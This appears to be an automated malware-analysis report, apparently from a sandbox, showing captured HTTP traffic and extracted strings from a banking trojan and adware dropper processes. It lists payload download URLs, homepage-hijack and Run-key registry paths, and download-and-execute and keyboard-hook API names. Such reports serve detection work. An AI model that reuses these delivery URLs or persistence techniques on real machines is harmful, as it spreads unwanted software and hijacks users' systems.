Transfer-Encoding: chunked
Connection: close
Server: Apache
Expires: Wed, 07 May 2014 10:32:31 GMT
Cache-Control: max-age=300
Content-Encoding: gzip
3437..............yW......S..\j...M{zl./..6m...i..,M......B....{. m...
{..].A...~.a{.....bv5.......w..0.....i.n.N&...e.x.-..E.....t...iR...._
_D..YxQ.ic7......pz>..e...........g..|....6%.j%.\.}o.E.d....Y.~....
{x.........0.f.(...i..C>..r...I.g.X..(.2O.Iq.3..i..w..a....4.....`.
..A..{..p?..Q~....Q.}=.q$..I..D..4...'A....n9...<.#.4...0....<|.
.}..0.7.....".E.tk ..j.N~.._...i...|.....Q.q.h.2]].......ux.O....n...|
.-.U.(....~..........t...k....Q{.M.....Z~.OO..".|... a..h6.\5..A...z..
..7d.5....2.4w.0L...w.."k....$..?;H....@..W.......z.......Z.0...t.zb..
..v=1..3...~|..mm=k.|..O[[Y{v..Q..Yf.a.1:..Y..*W.d(.......A5..'. }lo..
....:cj?G..zY{Z...I.Y.........O}?..x.?.OTU....T.9.j"Ozt..c...=.....>
;...}Lq..l.]V..C .5.... ..Y}..X..g.....~o....?..O.4....;.0....e.....yk
....z.c..4..i`>..X...1[...Q........&..4.E2.g...Q;.E.EV..y9....$Z\M.
.c&.$.....aV....Wo...v....(.|p{.|....*....rW>...L .=.....(....y....
e...@O.qc....}.R3o}.=8x..k>..=..9...i6..w ..(N.......H... i...,.Wa.
.!1I.a.......;l....f....."'r.N.q.^.t.!.W...q{1..%..G......Y....7....a.
.A..-...._.@....3[.c....j.....K....2..ej_h..w."l..j.B..I........4.Z...
............,z..;.wv.e.(...:............XV..-].HTTP/1.1 200 OK..Date:
Wed, 07 May 2014 10:27:31 GMT..Content-Type: application/x-javascript.
.Last-Modified: Wed, 16 Apr 2014 09:59:09 GMT..Transfer-Encoding: chun
ked..Connection: close..Server: Apache..Expires: Wed, 07 May 2014 10:3
2:31 GMT..Cache-Control: max-age=300..Content-Encoding: gzip..3437....
..........yW......S..\j...M{zl./..6m...i..,M......B....{. m...{..]

<<< skipped >>>

GET /9.gif?abc=1&rnd=557467190 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Server: Tengine
Date: Wed, 07 May 2014 10:27:26 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=jvjwC0DkbHMCAcGK9Oc9dLvc; expires=Sat, 04-May-24 10:27:26 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=92efa130; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=0c9782443e5b20a14f38b12f_1399458446; expires=Sat, 04-May-24 10:27:26 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server:
Tengine..Date: Wed, 07 May 2014 10:27:26 GMT..Content-Type: image/gif
..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CUR
a ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=jvjwC0DkbH
MCAcGK9Oc9dLvc; expires=Sat, 04-May-24 10:27:26 GMT; path=/; domain=.m
mstat.com..Set-Cookie: sca=92efa130; path=/; domain=.cnzz.mmstat.com..
Set-Cookie: atpsida=0c9782443e5b20a14f38b12f_1399458446; expires=Sat,
04-May-24 10:27:26 GMT; path=/; domain=.cnzz.mmstat.com..Location: htt
p://pcookie.cnzz.com/app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc..Expires: T
hu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cach
e..GIF89a.............!.......,...........L..;..


GET /stat.php?id=4327411&web_id=4327411&show=pic HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s85.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 07 May 2014 10:27:24 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 07 May 2014 10:27:24 GMT
Expires: Wed, 07 May 2014 11:57:24 GMT
ef2..(function(){function l(){this.c="4327411";this.R="z";this.N="pic"
;this.K="";this.M="";this.o="1399458444";this.P="hzs2.cnzz.com";this.L
="";this.s="CNZZDATA" this.c;this.r="_CNZZDbridge_" this.c;this.G="_cn
zz_CV" this.c;this.u="0";this.B={};this.a={};this.la()}function g(a,b)
{try{var c=[];c.push("siteid=4327411");.c.push("name=" d(a.name));c.pu
sh("msg=" d(a.message));c.push("r=" d(h.referrer));c.push("page=" d(f.
location.href));c.push("agent=" d(f.navigator.userAgent));c.push("ex="
d(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image)
.src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(e){}}var h=doc
ument,f=window,d=encodeURIComponent,k=decodeURIComponent,p=unescape,r=
escape,m="https:"===f.location.protocol?"https:":"http:",s=m "//c.cnzz
.com/core.php";l.prototype={la:function(){try{this.U(),.this.J(),this.
ia(),this.H(),this.m(),this.ga(),this.fa(),this.ja(),this.j(),this.ea(
),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),f[this.r
]=f[this.r]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:func
tion(){try{var a=this;f._czc={push:function(){return a.C.apply(a,argum
ents)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=f._czc;if(
"[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){
var c=a[b];switch(c[0]){case "_setAccount":f._cz_account="[object Stri
ng]"===.{}.toString.call(c[1])?c[1]:String(c[1]);break;case "_setAutoP
ageview":"boolean"===typeof c[1]&&(f._cz_autoPageview=c[1])}}}catch(e)
{g(e,"cS failed")}},qa:function(){try{if("undefined"===typeof f._c

<<< skipped >>>

The Trojan-Banker connects to the servers at the folowing location(s):

vsgrtaho.exe_1684:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
htKeyword
EInvalidOperation
u%CNu
%s_%d
.Owner
EInvalidGraphicOperation
UhÛ
USER32.DLL
comctl32.dll
PasswordCharLDD
OnKeyDown
OnKeyPressH
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
IMM32.DLL
AutoHotkeysl:D
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview`AD
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
ole32.dll
olepro32.dll
IWebBrowser
IWebBrowserApp\
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowser
webpopup
webcount
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
Program Files\Internet Explorer\iexplore.exe
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\DefaultIcon
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\Open(&O)
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\Open(&O)\Command
CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0
CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\ShellFolder
\ieframe.dll,-190
\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
*.lnk
Opera.lnk
WiseBrowser.lnk
TT.lnk
Mozilla Firefox.lnk
3.lnk
Maxthon.lnk
pwb.dll
http://adsvc2.9365.info/ad/softad/pwb.htm
http://www.9365.info
www.9365.info
xxvfrg.bat
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
shell32.dll
ShellExecuteA
URLMON.DLL
URLDownloadToFileA
>#>'> >/>
2"3&3*3.32363:3>3
;%; ;7;?;{;
>(>3>;>[>{>
< <$<(<,<0<
8'8/8@8[8
1 1$1(1,10141
465;5_5{5
KWindows
UrlMon
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
http://adsvc2.9365.info/ad/softad/popup.htm
http://adsvc2.9365.info/count/softcount/?pwb
8Listbox (%s) style must be virtual in order to set Count"Unable to find a Table Of Contents
No help found for %s#No context-sensitive help installed$No topic-based help system installed
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Unable to insert a line Clipboard does not support Icons/Menu '%s' is already being used by another form
Error setting %s.Count
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Cannot create file %s
Cannot open file %s
Unable to write to %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Invalid variant operation"Variant method calls not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

axuls.exe_884:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
u%CNu
Uh.AA
.Owner
ieoduui.bat
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
GGSafe_tjywmax(52).exe
http://download.grandcloud.cn/9291/15765/GGSafe.exe
hzsoft\GGSafe_tjywmax(52).exe
IFoxInstall-y-c203945859-run-s-x.exe
http://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
http://download.grandcloud.cn/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe
hzsoft\IFoxInstall-y-c203945859-run-s-x.exe
setup_open_341.exe
http://download.wuji.com/wuji/open/setup_open_341.exe
hzsoft\setup_open_341.exe
s1014.exe
http://down.xiaoxinrili.com/hezi/jm/s1014.exe
hzsoft\s1014.exe
setupX_2001_131.exe
http://www.yldsjs.com/setupX_2001_131.exe
hzsoft\setupX_2001_131.exe
LD_2075_S.exe
http://xz.657080.com/download.php/LD_2075_S.exe
hzsoft\LD_2075_S.exe
http://download.wallba.com/download.php/kuping_s_50996.exe
hzsoft\kuping_s_50996.exe
sOnlinetime1.4.1_1114.exe
http://222.76.213.168:8765/sOnlinetime1.4.1_1114.exe
http://download.grandcloud.cn/9291/17153/sOnlinetime1.4.1_1114.exe
hzsoft\sOnlinetime1.4.1_1114.exe
setup_2948-140896.exe
http://click.t3nlink.com/link/140896/setup_2948-140896.exe
hzsoft\setup_2948-140896.exe
pczh_110_157239.exe
http://xz.fuzhicheng.com/n/pczh_110_157239.exe
hzsoft\pczh_110_157239.exe
play_3020_161196.exe
http://www.huamei-global.com/play_3020_161196.exe
hzsoft\play_3020_161196.exe
unersqa.exe
unotcvb.exe
setup_open_188.exe
setupX_054.exe
setup_2949-14598.exe
Program Files\2345Explorer\Uninstall.exe
http://www.9365.info
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
URLMON.DLL
URLDownloadToFileA
6 6$6(6,6064686<6
7"7&7*7.72767
?'? ?/?3?7?;?
0"0&0*0.02060
KWindows
UrlMon
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file %s
Cannot open file %s$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

axult.exe_1744:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
u%CNu
Uh.UA
.Owner
ksydths.bat
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
setup_2949-14598.exe
http://download.grandcloud.cn/9291/15474/setup_2949-14598.exe
hzsoft\setup_2949-14598.exe
yuyuset_26_151422.exe
http://down.junshn.com/new/yuyuset_26_151422.exe
hzsoft\yuyuset_26_151422.exe
setup_qd304.exe
http://down.guangsu.cn/qdn/setup_qd304.exe
hzsoft\setup_qd304.exe
UUSEE_kb1003_Setup_133149.exe
http://download.uusee.com/pop1/kb1003/UUSEE_kb1003_Setup_133149.exe
hzsoft\UUSEE_kb1003_Setup_133149.exe
WanDouJiaSetup_zhimeng7_kb.exe
http://dl.wandoujia.com/files/third/WanDouJiaSetup_zhimeng7_kb.exe
hzsoft\WanDouJiaSetup_zhimeng7_kb.exe
wuzun-zm-157391-v6.exe
http://downloads.t3nlink.com/packages/g_wz/default2/wuzun-zm-157391-v6.exe
hzsoft\wuzun-zm-157391-v6.exe
wauee_jx036.exe
http://download.grandcloud.cn/9291/19525/wauee_jx036.exe
hzsoft\wauee_jx036.exe
yszj_zhimeng_160110.exe
http://download.grandcloud.cn/9291/19156/yszj_zhimeng_160110.exe
hzsoft\yszj_zhimeng_160110.exe
365weatherIns_202.exe
http://lm.beilequ.com/update/365/365weatherIns_202.exe
hzsoft\365weatherIns_202.exe
yuemar_x06.exe
http://down.yuemar.net:888/yuemar_x06.exe
hzsoft\yuemar_x06.exe
-8388_158017_xc.exe
http://download.grandcloud.cn/9291/20572/-8388_158017_xc.exe
hzsoft\-8388_158017_xc.exe
unersqa.exe
unotcvb.exe
IFoxInstall-y-c203945859-run-s-x.exe
setup_open_188.exe
setupX_054.exe
http://www.9365.info
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
URLMON.DLL
URLDownloadToFileA
?!?%?)?-?1?^?
KWindows
UrlMon
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file %s
Cannot open file %s$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

wjplay.exe_1456:

.text
`.rdata
@.data
.rsrc
@.reloc
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
portuguese-brazilian
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
http://update.wuji.com/
\SysConfig.ini
Software\Microsoft\Windows\CurrentVersion\Run
"%s" -mini
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WJNews.exe
"%s%s" -mini
http://wj.wuji.com/
<4,$?7/'
(3-!0,1'8"5.*2$
morewin.xml
AdWebBrowser
adwin.xml
FBWebBrowser
feedback.xml
web_feedback
locallist.xml
list_item.xml
operation
{i menu_6.png}
popmenu.xml
btn_%s
file='menuitem.png' source='0,0,120,30'
{i i_youku.png}
{i i_tudou.png}
{i i_sohu.png}
{i i_qiyi.png}
{i i_pptv.png} PPTV
{i i_leshi.png}
{i i_pps.png} PPS
{i i_qq.png}
{i i_wasu.png}
file='menuitem.png' source='0,30,120,60'
PopSrc.xml
poptip.xml
http://www.hao123.com/?tn=97514469_hao_pg
xml/bottom.xml
%ProgramFiles%\Internet Explorer\iexplore.exe
%s\%s
CheckUpdate.xml
PlayerUpdate.exe
http://tj.wuji.com/
feedback/b.html
playlist.xml
EkanWebBrowser
homewin.xml
Data/user2.ini
%s?%s
a.ashx
00:00:00:00:00:00
%d-%d-%d %d:%d:%d
X:X:X:X:X:X
//./%s
client.ini
2000-01-01
Software\Microsoft\Windows NT\CurrentVersion
http://download.wuji.com/
pu.exe
%d-%d-%d
%d-d-d
SysConfig.ini
%s\360se\360se.ini
%s\SogouExplorer\config.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TheWorld.exe
\TheWorld.ini
AppUpdate/PlayerUpdate.zip
AppUpdate/WJNews.zip
apnews.exe
AppUpdate/apnews.zip
server.ini
appupdate/ver.ini
WujiPlayer.%s
Data\wj.ico,0
%s\DefaultIcon
%s\Shell
%s\Shell\Open
%s\Shell\Open\Command
"%s" "%%1"
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\%s\UserChoice
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\%s
http://update.wuji.com/tj.ashx
http://www.hao123.com/?tn=39005018_672_hao_pg
http://update.wuji.com/goUrl.html?
data\tab_more.png
tab/tab_more.png
tab/url.txt
PlayWebBrowser
mainwin.xml
http://www.wuji.com
tab_web
file='%sData\tab_more.png' source='0,0,100,40'
file='%sData\tab_more.png' source='0,40,100,80'
file='%sData\tab_more.png' source='0,80,100,120'
xoxo/liebiao.html
Data/Def.html
txt_url
file='bgtab1.png' corner='746,96,1,1'
file='bgtab2.png' corner='746,96,1,1'
tab_weblist
%splay.html?vodinfo=%s_%s_1
play.html?vodinfo=
%s_%s_%s
%s_%s_%d
%splay.html?vodinfo=%s
\ch.ini
sysConfig.xml
tab_hotkey
AppUpdate/getver.html
AppUpdate/IsUpdate.html
AppUpdate/Done.html
AppUpdate/Error.html
split.xml
WebToolBar
ToolBar.xml
close.xml
E:\CPP\[2012-9]
\WujiSimple\bin\wjplay.pdb
WinExec
KERNEL32.dll
RegisterHotKey
UnregisterHotKey
USER32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
?NavigateUrl@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?NavigateHomePage@CWebBrowserUI@DuiLib@@QAEXXZ
?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z
?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z
?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z
?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z
?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z
?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z
?GetExternal@CWebBrowserUI@DuiLib@@UAGJPAPAUIDispatch@@@Z
?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z
?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z
?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z
?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z
?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ
?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ
?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z
?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z
?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z
?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z
?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z
?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z
?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z
?Release@CWebBrowserUI@DuiLib@@UAGKXZ
?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ
?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z
?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ
?CommandStateChange@CWebBrowserUI@DuiLib@@IAEXJF@Z
?NewWindow3@CWebBrowserUI@DuiLib@@IAEXPAPAUIDispatch@@AAPAFKPA_W2@Z
?NavigateComplete2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@@Z
?NavigateError@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@11AAPAF@Z
?BeforeNavigate2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@1111AAPAF@Z
?SetAttribute@CWebBrowserUI@DuiLib@@MAEXPBD0@Z
?ReleaseControl@CWebBrowserUI@DuiLib@@MAEXXZ
?DoCreateControl@CWebBrowserUI@DuiLib@@UAE_NXZ
??1CWebBrowserUI@DuiLib@@UAE@XZ
??0CWebBrowserUI@DuiLib@@QAE@XZ
?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z
?SetWebBrowserEventHandler@CWebBrowserUI@DuiLib@@QAEXPAVCWebBrowserEventHandler@2@@Z
?Refresh@CWebBrowserUI@DuiLib@@QAEXXZ
DuiLib.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
SHLWAPI.dll
PSAPI.DLL
IPHLPAPI.DLL
NETAPI32.dll
GetCPInfo
GetProcessHeap
OLEAUT32.dll
zcÁ
.?AVAdWebEventListener@@
.?AVCWebBrowserUI@DuiLib@@
.?AVAdWebBrowser@@
.?AVFBWebBrowser@@
.?AVFBWebCall@@
.?AVPlayWebBrowser@@
.?AVCWebBrowserEventHandler@DuiLib@@
.?AV?$TTimer@VEkanWebEvent@@@@
.?AVEkanWebEvent@@
.?AVEkanWebBrowser@@
.?AVEKanWebCall@@
.?AVWebToolBar@@
%Program Files%\wjplay2\20140507132818\wjplay.exe
6$666?6\6
7 7$7(7=8
88S8w8
; ;$;(;,;0;4;8;<;@;
>$?@?`?|?
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
2.14.3.29
ZQPlayer.rc

WJSpeed.exe_2788:

.idata
.rdata
P.XW80
`.rsrc
P.XW81
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
OnKeyDown
OnKeyPress
OnKeyUp
UrlMon
Proportional
OnProgressHQC
Uhs%C
UhE%C
%s%s%s%s%s%s%s%s%s%s
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys,|D
AutoHotkeyst|D
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowStateX~D
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
%s, ClassID: %s
ole32.dll
olepro32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
